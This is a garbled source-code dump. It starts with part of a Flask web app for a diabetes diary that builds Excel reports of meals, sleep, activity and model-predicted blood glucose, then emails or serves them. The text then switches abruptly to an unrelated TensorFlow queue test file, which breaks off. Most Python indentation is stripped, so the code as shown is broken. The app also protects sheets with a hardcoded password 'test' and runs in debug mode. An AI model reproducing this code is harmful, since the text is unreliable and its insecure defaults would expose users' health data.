activity1 = pd.DataFrame(L1, columns=['Дата', 'Время',
'Длительность, мин.',
'Тип нагрузки', 'Пустое'])
activity2 = activity1.groupby(['Дата']).agg({
'Время': lambda tags: '\n'.join(tags),
'Длительность, мин.': lambda tags: '\n'.join(tags),
'Тип нагрузки': lambda tags: '\n'.join(tags),
'Пустое': lambda tags: '\n'.join(tags)})
# Sleep
sleep1 = pd.DataFrame(L2, columns=['Дата', 'Время',
'Длительность, ч.'])
sleep2 = \
sleep1.groupby(
['Дата']).agg({'Время': lambda tags: '\n'.join(tags),
'Длительность, ч.': lambda tags: '\n'.join(tags)})
luck = pd.merge(left=activity2,
right=sleep2,
on="Дата", how='outer')
luck["Дата1"] = pd.to_datetime(luck.index, format='%d.%m.%Y')
luck = luck.sort_values(by="Дата1")
if len(luck.index) > 0:
start1 = luck.index[0]
end1 = luck.index[len(luck.index) - 1]
start1 = datetime.datetime.strptime(start1, '%d.%m.%Y')
end1 = datetime.datetime.strptime(end1, '%d.%m.%Y')
start1 = start1.strftime('%m/%d/%Y')
end1 = end1.strftime('%m/%d/%Y')
luck = luck.drop(["Дата1"], axis=1)
ranges = pd.date_range(start=start1, end=end1)
ranges1 = ranges.to_pydatetime()
new_ranges = []
for i in range(len(ranges1)):
new_ranges.append(ranges1[i].strftime('%d.%m.%Y'))
luck = luck.reindex(new_ranges)
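# Reindexing on the continuous date range adds empty rows for days that have
# neither activity nor sleep records.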
else:
luck = luck.drop(["Дата1"], axis=1)
# List of complete days
full_days1 = pd.DataFrame(full_days, columns=['Дата'])
full_days1['Дата1'] = pd.to_datetime(full_days1['Дата'],
format='%d.%m.%Y')
full_days1 = full_days1.sort_values(by='Дата1')
full_days1 = full_days1.drop(['Дата1'], axis=1)
# List of deleted entries
delet_ed = pd.DataFrame(deleted, columns=['id', 'Дата', 'Время', 'Тип',
'Подробности'])
delet_ed = delet_ed.drop(['id'], axis=1)
delet_ed['Дата1'] = pd.to_datetime(delet_ed['Дата'], format='%d.%m.%Y')
delet_ed = delet_ed.sort_values(by='Дата1')
delet_ed = delet_ed.drop(['Дата1'], axis=1)
# Predict blood glucose
tb = pd.DataFrame(tb, columns=['date', 'time', 'types_food_n', 'BG0',
'GI', 'carbo', 'prot', 'kr'])
tb['GI'] = pd.to_numeric(tb['GI'], downcast='float')
tb['carbo'] = pd.to_numeric(tb['carbo'], downcast='float')
tb['prot'] = pd.to_numeric(tb['prot'], downcast='float')
tb['kr'] = pd.to_numeric(tb['kr'], downcast='float')
tb['BG0'] = pd.to_numeric(tb['BG0'], downcast='float')
tb = tb.groupby(['date', 'time', 'types_food_n', 'BG0'],
as_index=False).sum()
tb['GL'] = tb['GI']*tb['carbo']/100
tb['DateTime'] = tb['date'] + ' ' + tb['time']
tb['DateTime'] = pd.to_datetime(tb['DateTime'], format='%d.%m.%Y %H:%M')
tb = tb.drop(['date', 'time', 'GI'], axis=1)
prot = list()
for i in range(len(tb['DateTime'])):
start_date = tb['DateTime'][i]
mask = (tb['DateTime']
<= start_date) & (tb['DateTime']
>= (start_date
- pd.Timedelta(value=6, unit='h')))
prot_b6h = tb.loc[mask]['prot'].aggregate(np.sum)
prot.append(prot_b6h)
tb.insert(7, 'prot_b6h', prot, True)
tb = tb.drop(['prot'], axis=1)
BMI = list()
for i in range(len(tb['DateTime'])):
BMI.append(BMI0)
if tb['types_food_n'][i] == 'Завтрак':
tb['types_food_n'][i] = 1
elif tb['types_food_n'][i] == 'Обед':
tb['types_food_n'][i] = 2
elif tb['types_food_n'][i] == 'Ужин':
tb['types_food_n'][i] = 3
else:
tb['types_food_n'][i] = 4
tb.insert(7, 'BMI', BMI, True)
tb = tb.reindex(columns=["DateTime", "BG0", "GL", "carbo", "prot_b6h",
"types_food_n", "kr", "BMI"])
predict = list()
for i in range(len(tb['DateTime'])):
best_model = xgb.Booster()
best_model.load_model(model)
core_features = ["BG0", "gl", "carbo",
"prot_b6h", "types_food_n", "kr", "BMI"]
X_test = [tb.iloc[i, 1:7].values.tolist()]
predicted = best_model.predict(xgb.DMatrix(np.array(X_test)))
predict.append(predicted[0])
tb.insert(3, 'Предсказанный сахар после', predict, True)
date3 = list()
time3 = list()
tb['Прием пищи'] = tb['types_food_n']
for i in range(len(tb['DateTime'])):
date3.append(tb['DateTime'][i].strftime('%d.%m.%Y'))
time3.append(tb['DateTime'][i].strftime('%H:%M'))
if tb['Прием пищи'][i] == 1:
tb['Прием пищи'][i] = 'Завтрак'
elif tb['Прием пищи'][i] == 2:
tb['Прием пищи'][i] = 'Обед'
elif tb['Прием пищи'][i] == 3:
tb['Прием пищи'][i] = 'Ужин'
else:
tb['Прием пищи'][i] = 'Перекус'
tb.insert(0, 'Дата', date3, True)
tb.insert(1, 'Время', time3, True)
tb = tb.drop(['DateTime'], axis=1)
tb = tb.drop(['types_food_n'], axis=1)
tb['Сахар до'] = tb['BG0']
tb = tb.drop(['BG0'], axis=1)
tb['Гликемическая нагрузка'] = tb['GL']
tb = tb.drop(['GL'], axis=1)
tb = tb.drop(['carbo'], axis=1)
tb = tb.drop(['prot_b6h'], axis=1)
tb = tb.drop(['kr'], axis=1)
tb = tb.drop(["BMI"], axis=1)
tb = tb[['Дата', 'Время', 'Прием пищи', 'Сахар до',
'Предсказанный сахар после', 'Гликемическая нагрузка']]
# Build the combined Excel file
dirname = os.path.dirname(__file__)
filename = os.path.join(dirname, '%s.xlsx' % session["username"])
writer = pd.ExcelWriter(filename,
engine='xlsxwriter',
options={'strings_to_numbers': True,
'default_date_format': 'dd/mm/yy'})
a.to_excel(writer, sheet_name='Приемы пищи', startrow=0, startcol=0)
tb.to_excel(writer, sheet_name='Предсказание сахара',
startrow=0, startcol=0)
luck.to_excel(writer, sheet_name='Физическая нагрузка и сон',
startrow=0, startcol=1)
full_days1.to_excel(writer, sheet_name='Список полных дней',
startrow=2, startcol=-1)
delet_ed.to_excel(writer, sheet_name='Удаленные записи',
startrow=2, startcol=-1, header=False)
writer.close()
# Adjust the formatting of the meals sheet
wb = openpyxl.load_workbook(filename)
sheet = wb['Приемы пищи']
ws = wb.active
for row in ws.iter_rows():
for cell in row:
cell.alignment = cell.alignment.copy(wrapText=True)
cell.alignment = cell.alignment.copy(vertical='center')
for b in ['F', 'G', 'H', 'I', 'J', 'L', 'M', 'N', 'O', 'P', 'Q', 'R',
'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
'AA', 'AB', 'AC', 'AD', 'AE', 'AF', 'AG', 'AH', 'AI']:
for i in range(2, (len(a['Микроэлементы']) + 2)):
k = i
cs = sheet['%s' % b + str(k)]
cs.alignment = cs.alignment.copy(horizontal='left')
for c in ['B', 'C', 'D']:
for i in range(2, (len(a['Микроэлементы']) + 2)):
k = i
cs = sheet['%s' % c + str(k)]
cs.alignment = cs.alignment.copy(horizontal='center')
sheet.column_dimensions['A'].width = 20
sheet.column_dimensions['B'].width = 10
sheet.column_dimensions['C'].width = 10
sheet.column_dimensions['D'].width = 16
sheet.column_dimensions['E'].width = 50
sheet.column_dimensions['F'].width = 13
sheet.column_dimensions['G'].width = 20
sheet.column_dimensions['H'].width = 20
sheet.column_dimensions['I'].width = 20
sheet.column_dimensions['J'].width = 20
sheet.column_dimensions['K'].width = 20
sheet.column_dimensions['L'].width = 20
sheet.column_dimensions['M'].width = 20
sheet.column_dimensions['N'].width = 20
sheet.column_dimensions['O'].width = 20
sheet.column_dimensions['P'].width = 20
sheet.column_dimensions['R'].width = 20
sheet.column_dimensions['S'].width = 20
sheet.column_dimensions['T'].width = 20
sheet.column_dimensions['O'].width = 20
sheet.column_dimensions['U'].width = 20
sheet.column_dimensions['V'].width = 20
sheet.column_dimensions['W'].width = 20
sheet.column_dimensions['X'].width = 20
sheet.column_dimensions['Y'].width = 20
sheet.column_dimensions['Z'].width = 20
sheet.column_dimensions['Q'].width = 20
sheet.column_dimensions['AA'].width = 20
sheet.column_dimensions['AB'].width = 20
sheet.column_dimensions['AC'].width = 20
sheet.column_dimensions['AD'].width = 20
sheet.column_dimensions['AE'].width = 20
sheet.column_dimensions['AF'].width = 20
sheet.column_dimensions['AG'].width = 30
sheet.column_dimensions['AH'].width = 30
sheet.column_dimensions['AI'].width = 23
b1 = ws['B1']
b1.fill = PatternFill("solid", fgColor="fafad2")
c1 = ws['C1']
c1.fill = PatternFill("solid", fgColor="fafad2")
d1 = ws['D1']
d1.fill = PatternFill("solid", fgColor="fafad2")
e1 = ws['E1']
e1.fill = PatternFill("solid", fgColor="fafad2")
f1 = ws['F1']
f1.fill = PatternFill("solid", fgColor="fafad2")
g1 = ws['G1']
g1.fill = PatternFill("solid", fgColor="fafad2")
h1 = ws['H1']
h1.fill = PatternFill("solid", fgColor="fafad2")
i1 = ws['I1']
i1.fill = PatternFill("solid", fgColor="fafad2")
j1 = ws['J1']
j1.fill = PatternFill("solid", fgColor="fafad2")
m1 = ws['M1']
m1.fill = PatternFill("solid", fgColor="fafad2")
n1 = ws['N1']
n1.fill = PatternFill("solid", fgColor="fafad2")
o1 = ws['O1']
o1.fill = PatternFill("solid", fgColor="fafad2")
p1 = ws['P1']
p1.fill = PatternFill("solid", fgColor="fafad2")
q1 = ws['Q1']
q1.fill = PatternFill("solid", fgColor="fafad2")
r1 = ws['R1']
r1.fill = PatternFill("solid", fgColor="fafad2")
s1 = ws['S1']
s1.fill = PatternFill("solid", fgColor="fafad2")
t1 = ws['T1']
t1.fill = PatternFill("solid", fgColor="fafad2")
u1 = ws['U1']
u1.fill = PatternFill("solid", fgColor="fafad2")
v1 = ws['V1']
v1.fill = PatternFill("solid", fgColor="fafad2")
w1 = ws['W1']
w1.fill = PatternFill("solid", fgColor="fafad2")
x1 = ws['X1']
x1.fill = PatternFill("solid", fgColor="fafad2")
y1 = ws['Y1']
y1.fill = PatternFill("solid", fgColor="fafad2")
z1 = ws['Z1']
z1.fill = PatternFill("solid", fgColor="fafad2")
aa1 = ws['AA1']
aa1.fill = PatternFill("solid", fgColor="fafad2")
ab1 = ws['AB1']
ab1.fill = PatternFill("solid", fgColor="fafad2")
ac1 = ws['AC1']
ac1.fill = PatternFill("solid", fgColor="fafad2")
ad1 = ws['AD1']
ad1.fill = PatternFill("solid", fgColor="fafad2")
ae1 = ws['AE1']
ae1.fill = PatternFill("solid", fgColor="fafad2")
af1 = ws['AF1']
af1.fill = PatternFill("solid", fgColor="fafad2")
ah1 = ws['AH1']
ah1.fill = PatternFill("solid", fgColor="fafad2")
ag1 = ws['AG1']
ag1.fill = PatternFill("solid", fgColor="fafad2")
ws['AH1'].fill = PatternFill("solid", fgColor="fafad2")
ws['L1'].fill = PatternFill("solid", fgColor="fafad2")
ws['AI1'].fill = PatternFill("solid", fgColor="fafad2")
i = 1
for num in range(1, len(a['Микроэлементы']) + 1):
if ws[f'B{num + 1}'].value != ws[f'B{num}'].value:
if i % 2 == 0:
ws[f'B{num + 1}'].fill = \
PatternFill("solid", fgColor="f0f8ff")
i = i + 1
else:
ws[f'B{num + 1}'].fill = \
PatternFill("solid", fgColor="f0fff0")
i = i + 1
else:
ws[f'B{num + 1}']._style = ws[f'B{num}']._style
for i in ["C", "D", "E", "F", "G", "H", "I", "J", 'L', 'M', 'N', 'O',
'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W',
'X', 'Y', 'Z', 'AA', 'AB', 'AC', 'AD', 'AE', 'AF',
'AG', 'AH', 'AI']:
for num in range(1, len(a['Микроэлементы']) + 2):
cell = ws[f'B{num}']
ws[f'{i}{num}'].fill = \
PatternFill("solid", fgColor=cell.fill.start_color.index)
thin_border = Border(left=Side(style='hair'),
right=Side(style='hair'),
top=Side(style='hair'),
bottom=Side(style='hair'))
no_border = Border(left=Side(border_style=None),
right=Side(border_style=None),
top=Side(border_style=None),
bottom=Side(border_style=None))
for row in ws.iter_rows():
for cell in row:
cell.border = thin_border
merged_cells_range = ws.merged_cells.ranges
for merged_cell in merged_cells_range:
merged_cell.shift(0, 2)
ws.insert_rows(1, 2)
# Separate the main indicators from the micronutrients
ws['K3'].value = ''
for i in range(len(a['Микроэлементы']) + 3):
i1 = str(i + 1)
ws[f'K{i1}'].border = no_border
# Remove the formatting from the first column (A) and the last one (AI)
for i in range(len(a['Микроэлементы']) + 3):
i1 = str(i + 1)
ws[f'A{i1}'].border = no_border
ws[f'A{i1}'].value = ''
# Format the header rows
ws['A2'] = 'Приемы пищи'
ws['A1'] = '%s' % fio[0][0]
sheet.merge_cells('A1:AI1')
ws['A2'].border = thin_border
ws['A2'].fill = PatternFill("solid", fgColor="fafad2")
ws['A2'].font = Font(bold=True)
sheet.merge_cells('A2:AI2')
length2 = str(len(a['Микроэлементы']) + 5)
length3 = str(len(a['Микроэлементы']) + 6)
sheet.merge_cells('C%s:E%s' % (length3, length3))
ws['A%s' % length2] = 'Среднее по дням'
ws['A%s' % length2].font = Font(bold=True)
ws['B%s' % length3] = 'Дата'
ws['B%s' % length3].font = Font(bold=True)
ws['A%s' % length2].border = thin_border
ws['A%s' % length2].fill = PatternFill("solid", fgColor="fafad2")
ws['B%s' % length3].border = thin_border
ws['B%s' % length3].fill = PatternFill("solid", fgColor="fafad2")
ws['C%s' % length3].border = thin_border
ws['C%s' % length3].fill = PatternFill("solid", fgColor="fafad2")
# Repeat the same column headings at the bottom for the daily averages
mean21 = ['Масса, гр', 'Углеводы, гр',
'Белки, гр', 'Жиры, гр',
'ККал', '', 'Вода, в г', 'МДС, в г',
'Крахмал, в г', 'Пищ вол, в г',
'Орган кислота, в г', 'Зола, в г',
'Натрий, в мг', 'Калий, в мг', 'Кальций, в мг',
'Магний, в мг', 'Фосфор, в мг', 'Железо, в мг',
'Ретинол, в мкг', 'Каротин, в мкг',
'Ретин экв, в мкг', 'Тиамин, в мг',
'Рибофлавин, в мг',
'Ниацин, в мг', 'Аскорб кисл, в мг',
'Холестерин, в мг',
'НЖК, в г',
'Ниационвый эквивалент, в мг',
'Токоферол эквивалент, в мг',
'Гликемический индекс']
i = 0
for c in ['F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q',
'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
'Z', 'AA', 'AB', 'AC', 'AD', 'AE', 'AF', 'AG', 'AH', 'AI']:
ws[f'{c}%s' % length3] = mean21[i]
ws[f'{c}%s' % length3].border = thin_border
ws[f'{c}%s' % length3].fill = \
PatternFill("solid", fgColor="fafad2")
ws[f'{c}%s' % length3].font = Font(bold=True)
i = i + 1
# Clear the shaded cells of the empty column K
length5 = str(len(a['Микроэлементы']) + 8 + len(date))
ws['K%s' % length3]._style = copy(ws['K%s' % length5]._style)
ws['K%s' % length3].border = no_border
# Output the per-day averages
date1 = []
for i in range(len(date)):
date1.append(date[i][0])
date2 = pd.DataFrame({'Дата': date1})
date2['Дата1'] = pd.to_datetime(date2['Дата'], format='%d.%m.%Y')
date2 = date2.sort_values(by=['Дата1'])
date2 = date2.drop('Дата1', axis=1)
date = date2.values.tolist()
path = os.path.dirname(os.path.abspath(__file__))
db_16 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_16)
cur = con.cursor()
i = 7
for d in date:
sheet['B%s' % str(len(a['Микроэлементы']) + i)] = d[0]
cur.execute('''SELECT avg(libra), avg(carbo), avg(prot), avg(fat),
avg(energy), avg(water), avg(mds),
avg(kr), avg(pv), avg(ok), avg(zola), avg(na),
avg(k), avg(ca), avg(mg), avg(p), avg(fe),
avg(a), avg(kar), avg(re), avg(b1), avg(b2),
avg(rr), avg(c), avg(hol), avg(nzhk), avg(ne),
avg(te), avg(gi) FROM favourites
WHERE user_id = ?
AND date = ? ''', (session['user_id'], d[0]))
avg = cur.fetchall()
sheet['F%s' % str(len(a['Микроэлементы']) + i)] = avg[0][0]
sheet['G%s' % str(len(a['Микроэлементы']) + i)] = avg[0][1]
sheet['H%s' % str(len(a['Микроэлементы']) + i)] = avg[0][2]
sheet['I%s' % str(len(a['Микроэлементы']) + i)] = avg[0][3]
sheet['J%s' % str(len(a['Микроэлементы']) + i)] = avg[0][4]
sheet['L%s' % str(len(a['Микроэлементы']) + i)] = avg[0][5]
sheet['M%s' % str(len(a['Микроэлементы']) + i)] = avg[0][6]
sheet['N%s' % str(len(a['Микроэлементы']) + i)] = avg[0][7]
sheet['O%s' % str(len(a['Микроэлементы']) + i)] = avg[0][8]
sheet['P%s' % str(len(a['Микроэлементы']) + i)] = avg[0][9]
sheet['Q%s' % str(len(a['Микроэлементы']) + i)] = avg[0][10]
sheet['R%s' % str(len(a['Микроэлементы']) + i)] = avg[0][11]
sheet['S%s' % str(len(a['Микроэлементы']) + i)] = avg[0][12]
sheet['T%s' % str(len(a['Микроэлементы']) + i)] = avg[0][13]
sheet['U%s' % str(len(a['Микроэлементы']) + i)] = avg[0][14]
sheet['V%s' % str(len(a['Микроэлементы']) + i)] = avg[0][15]
sheet['W%s' % str(len(a['Микроэлементы']) + i)] = avg[0][16]
sheet['X%s' % str(len(a['Микроэлементы']) + i)] = avg[0][17]
sheet['Y%s' % str(len(a['Микроэлементы']) + i)] = avg[0][18]
sheet['Z%s' % str(len(a['Микроэлементы']) + i)] = avg[0][19]
sheet['AA%s' % str(len(a['Микроэлементы']) + i)] = avg[0][20]
sheet['AB%s' % str(len(a['Микроэлементы']) + i)] = avg[0][21]
sheet['AC%s' % str(len(a['Микроэлементы']) + i)] = avg[0][22]
sheet['AD%s' % str(len(a['Микроэлементы']) + i)] = avg[0][23]
sheet['AE%s' % str(len(a['Микроэлементы']) + i)] = avg[0][24]
sheet['AF%s' % str(len(a['Микроэлементы']) + i)] = avg[0][25]
sheet['AG%s' % str(len(a['Микроэлементы']) + i)] = avg[0][26]
sheet['AH%s' % str(len(a['Микроэлементы']) + i)] = avg[0][27]
sheet['AI%s' % str(len(a['Микроэлементы']) + i)] = avg[0][28]
i = i + 1
con.close()
# Left-align the per-day averages
length31 = len(a['Микроэлементы']) + 7
length4 = len(a['Микроэлементы']) + 7 + len(date)
for a in ['F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q',
'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
'Z', 'AA', 'AB', 'AC', 'AD', 'AE', 'AF', 'AG', 'AH', 'AI']:
for i in range(length31, length4):
sheet[f'{a}{i}'].alignment = \
sheet[f'{a}{i}'].alignment.copy(horizontal='left')
    for col in ['B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
                'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U',
                'V', 'W', 'X', 'Y', 'Z', 'AA', 'AB', 'AC', 'AD', 'AE', 'AF',
                'AG', 'AH', 'AI']:
        sheet[f'{col}3'].alignment = \
            sheet[f'{col}3'].alignment.copy(horizontal='left')
ws.protection.set_password('test')
wb.save(filename)
wb.close()
    # Format the physical activity and sleep sheet as needed
wb = openpyxl.load_workbook(filename)
sheet1 = wb['Физическая нагрузка и сон']
for row in sheet1.iter_rows():
for cell in row:
cell.alignment = cell.alignment.copy(wrapText=True)
cell.alignment = cell.alignment.copy(vertical='center')
cell.alignment = cell.alignment.copy(horizontal='left')
for row in sheet1.iter_rows():
for cell in row:
cell.border = thin_border
merged_cells_range = sheet1.merged_cells.ranges
for merged_cell in merged_cells_range:
merged_cell.shift(0, 2)
sheet1.insert_rows(1, 2)
sheet1['A1'] = '%s' % fio[0][0]
sheet1['A2'] = 'Физическая нагрузка'
sheet1['G2'] = 'Сон'
sheet1.merge_cells('A1:H1')
sheet1.column_dimensions['A'].width = 25
sheet1.column_dimensions['B'].width = 13
sheet1.column_dimensions['C'].width = 13
sheet1.column_dimensions['D'].width = 20
sheet1.column_dimensions['E'].width = 25
sheet1.column_dimensions['F'].width = 13
sheet1.column_dimensions['G'].width = 13
sheet1.column_dimensions['H'].width = 20
    for col in ('B', 'C', 'D', 'E', 'G', 'H'):
        sheet1[f'{col}3'].fill = PatternFill("solid", fgColor="fafad2")
    # Separate physical activity from sleep, remove the formatting
    # from the first column (A) and clean up minor defects
sheet1['F3'].value = ''
sheet1['C3'].value = 'Время'
sheet1['G3'].value = 'Время'
    for i in range(3, len(luck['Длительность, ч.']) + 4):
        i1 = str(i)
        sheet1[f'F{i1}'].border = no_border
        sheet1[f'A{i1}'].border = no_border
    # Fix up the header cells
sheet1['A2'].fill = PatternFill("solid", fgColor="fafad2")
sheet1['G2'].fill = PatternFill("solid", fgColor="fafad2")
sheet1['A2'].border = thin_border
sheet1['G2'].border = thin_border
sheet1['A2'].font = Font(bold=True)
sheet1['G2'].font = Font(bold=True)
for i in range(4, len(luck['Время_x']) + 4):
sheet1[f'B{i}'].font = Font(bold=False)
    # Shade every other row
k = 1
for i in range(4, len(luck['Длительность, ч.']) + 4):
if k % 2 == 0:
sheet1[f'B{i}'].fill = PatternFill('solid', fgColor='f0f8ff')
k = k + 1
else:
sheet1[f'B{i}'].fill = PatternFill('solid', fgColor='f0fff0')
k = k + 1
for i in ["C", "D", "E", "G", "H"]:
for num in range(4, len(luck['Длительность, ч.']) + 4):
cell = sheet1[f'B{num}']
sheet1[f'{i}{num}'].fill = \
PatternFill("solid", fgColor=cell.fill.start_color.index)
sheet1.protection.set_password('test')
wb.save(filename)
wb.close()
    # Format the list of complete days
wb = openpyxl.load_workbook(filename)
sheet2 = wb['Список полных дней']
for row in sheet2.iter_rows():
for cell in row:
cell.alignment = cell.alignment.copy(wrapText=True)
cell.alignment = cell.alignment.copy(vertical='center')
cell.alignment = cell.alignment.copy(horizontal='left')
cell.border = thin_border
sheet2['A1'] = '%s' % fio[0][0]
sheet2['A1'].border = no_border
sheet2['A2'] = 'Список полных дней'
sheet2.column_dimensions['A'].width = 25
sheet2['A2'].fill = PatternFill("solid", fgColor="fafad2")
sheet2['A3'].fill = PatternFill("solid", fgColor="fafad2")
sheet2['A2'].font = Font(bold=True)
sheet2['A3'].font = Font(bold=True)
sheet2.protection.set_password('test')
wb.save(filename)
wb.close()
    # Format the deleted records
wb = openpyxl.load_workbook(filename)
sheet3 = wb['Удаленные записи']
sheet3["A1"] = '%s' % fio[0][0]
sheet3["A2"].value = 'Удаленные записи'
sheet3["A2"].font = Font(bold=True)
sheet3["A2"].border = thin_border
sheet3["A2"].fill = PatternFill('solid', fgColor='fafad2')
sheet3.column_dimensions['A'].width = 25
sheet3.column_dimensions['B'].width = 10
sheet3.column_dimensions['C'].width = 30
sheet3.column_dimensions['D'].width = 25
sheet3.protection.set_password('test')
wb.save(filename)
wb.close()
    # Format the blood sugar prediction sheet
wb = openpyxl.load_workbook(filename)
sheet4 = wb['Предсказание сахара']
for row in sheet4.iter_rows():
for cell in row:
cell.alignment = cell.alignment.copy(wrapText=True)
cell.alignment = cell.alignment.copy(vertical='center')
for b in ["B", "C", "D", "E", "F", "G"]:
        for i in range(1, len(tb['Прием пищи']) + 2):
            cs = sheet4[f'{b}{i}']
            cs.alignment = cs.alignment.copy(horizontal='left')
sheet4.column_dimensions['B'].width = 15
sheet4.column_dimensions['C'].width = 15
sheet4.column_dimensions['D'].width = 15
sheet4.column_dimensions['E'].width = 15
sheet4.column_dimensions['F'].width = 30
sheet4.column_dimensions['G'].width = 25
    for col in ('B', 'C', 'D', 'E', 'F', 'G'):
        sheet4[f'{col}1'].fill = PatternFill("solid", fgColor="fafad2")
i = 1
for num in range(1, len(tb['Прием пищи']) + 1):
if sheet4[f'B{num + 1}'].value != sheet4[f'B{num}'].value:
if i % 2 == 0:
sheet4[f'B{num + 1}'].fill = \
PatternFill("solid", fgColor="f0f8ff")
i = i + 1
else:
sheet4[f'B{num + 1}'].fill = \
PatternFill("solid", fgColor="f0fff0")
i = i + 1
else:
sheet4[f'B{num + 1}']._style = sheet4[f'B{num}']._style
for i in ["C", "D", "E", "F", "G"]:
for num in range(2, len(tb['Прием пищи']) + 2):
cell = sheet4[f'B{num}']
sheet4[f'{i}{num}'].fill = \
PatternFill("solid", fgColor=cell.fill.start_color.index)
thin_border = Border(left=Side(style='hair'),
right=Side(style='hair'),
top=Side(style='hair'),
bottom=Side(style='hair'))
no_border = Border(left=Side(border_style=None),
right=Side(border_style=None),
top=Side(border_style=None),
bottom=Side(border_style=None))
for row in sheet4.iter_rows():
for cell in row:
cell.border = thin_border
for i in range(len(tb['Прием пищи']) + 3):
i1 = str(i + 1)
sheet4[f'A{i1}'].border = no_border
sheet4[f'A{i1}'].value = ''
merged_cells_range = sheet4.merged_cells.ranges
for merged_cell in merged_cells_range:
merged_cell.shift(0, 2)
sheet4.insert_rows(1, 2)
sheet4['A2'] = 'Предсказание сахара после приемов пищи'
sheet4['A1'] = '%s ИМТ = %s' % (fio[0][0], BMI0)
sheet4.merge_cells('A1:G1')
sheet4['A2'].border = thin_border
sheet4['A2'].fill = PatternFill("solid", fgColor="fafad2")
sheet4['A2'].font = Font(bold=True)
sheet4.merge_cells('A2:G2')
sheet4.protection.set_password('test')
wb.save(filename)
wb.close()
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
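# Note: Flask-Mail reads its configuration from the active application context, so a
# message sent from a background thread (as email() does below) has to re-enter
# app.app_context() explicitly, which is what the helper above does.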
@app.route('/email', methods=['GET', 'POST'])
@login_required
def email():
    # Send the report by email
if request.method == 'POST':
dirname = os.path.dirname(__file__)
filename = os.path.join(dirname, '%s.xlsx' % session["username"])
        # Get the list of email addresses to send the report to
mail1 = request.form.getlist('email_sendto')
do_tb()
        # Send the message by email
msg = Message('ДиаКомпаньон', sender='pochtadiacomp@gmail.com',
recipients=mail1)
msg.subject = "Никнейм пользователя: %s" % session["username"]
msg.body = 'Электронный отчет пользователя: %s' % fio[0][0]
with app.open_resource(filename) as attach:
msg.attach('%s.xlsx' % session["username"], 'sheet/xlsx',
attach.read())
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
try:
os.remove(filename)
except FileNotFoundError:
print('FileNotFoundError: нечего удалять')
return redirect(url_for('lk'))
@app.route('/sendto', methods=['GET', 'POST'])
@login_required
def download_file():
if request.method == 'POST':
dirname = os.path.dirname(__file__)
file_path = os.path.join(dirname, '%s.xlsx' % session["username"])
do_tb()
        # For Linux systems
# @after_this_request
# def removing(response):
# os.remove(file_path)
# return response
return send_file(file_path, as_attachment=True)
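        # The commented-out @after_this_request hook above would remove the generated
        # workbook once the request has been handled; as written, the .xlsx file is
        # left on disk after the download.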
@app.route("/setMBI", methods=['GET', 'POST'])
@login_required
def setMBI():
if request.method == 'POST':
jsonBMI = request.get_json()
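        # Expected request body (inferred from the key read below): a JSON object
        # such as {"BMI": 23.4}; the value is stored in the user table for the
        # currently logged-in user.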
path = os.path.dirname(os.path.abspath(__file__))
db_17 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_17)
cur = con.cursor()
cur.execute("""UPDATE user SET BMI = ? WHERE id = ?""",
(jsonBMI['BMI'], session["user_id"]))
con.commit()
con.close()
list2 = jsonify({"Message": "ИМТ записан"})
response = make_response(list2, 200)
return response
@app.route("/add_smth", methods=['GET', 'POST'])
@login_required
def add_smth():
if request.method == 'POST':
a101 = 'lala1'
print(a101)
return redirect(url_for('lk'))
if __name__ == '__main__':
app.run(debug=True)
|
random_shuffle_queue_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
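# A RandomShuffleQueue(capacity, min_after_dequeue, dtypes, ...) holds up to
# `capacity` elements, keeps at least `min_after_dequeue` elements in the queue
# after a dequeue (until the queue is closed), and returns elements in random
# order. A minimal sketch of the API exercised by the tests below (assumes a
# TF1-style default session, as provided by self.cached_session() in the tests):
#
#   q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
#   q.enqueue((1.0,)).run()       # enqueue op, run in the default session
#   value = q.dequeue().eval()    # dequeues one element, chosen at random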
@test_util.run_v1_only("RandomShuffleQueue removed from v2")
class RandomShuffleQueueTest(test.TestCase):
def setUp(self):
# Useful for debugging when a test times out.
super(RandomShuffleQueueTest, self).setUp()
tf_logging.error("Starting: %s", self._testMethodName)
def tearDown(self):
super(RandomShuffleQueueTest, self).tearDown()
tf_logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size().eval())
enqueue_op.run()
self.assertAllEqual(1, q.size().eval())
def testEnqueueWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=tensor_shape.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size().eval())
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.cached_session():
